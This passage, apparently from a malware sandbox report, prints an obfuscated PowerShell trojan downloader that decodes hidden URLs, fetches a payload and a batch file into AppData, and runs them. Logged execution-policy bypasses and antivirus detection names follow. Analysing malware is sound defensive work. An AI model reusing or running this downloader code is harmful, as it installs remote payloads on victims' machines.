$iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA 
@(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\main.bat" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\main.bat |
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Lionic | Trojan.Script.Generic.4!c |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
Symantec | Trojan.Gen.NPE |
ESET-NOD32 | VBS/Agent.QVR |
Avast | Script:SNH-gen [Drp] |
Cynet | Malicious (score: 99) |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
Tencent | Script.Trojan-Downloader.Generic.Xdkl |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
DrWeb | Trojan.DownLoader46.24389 |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
ALYac | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
MAX | malware (ai score=82) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |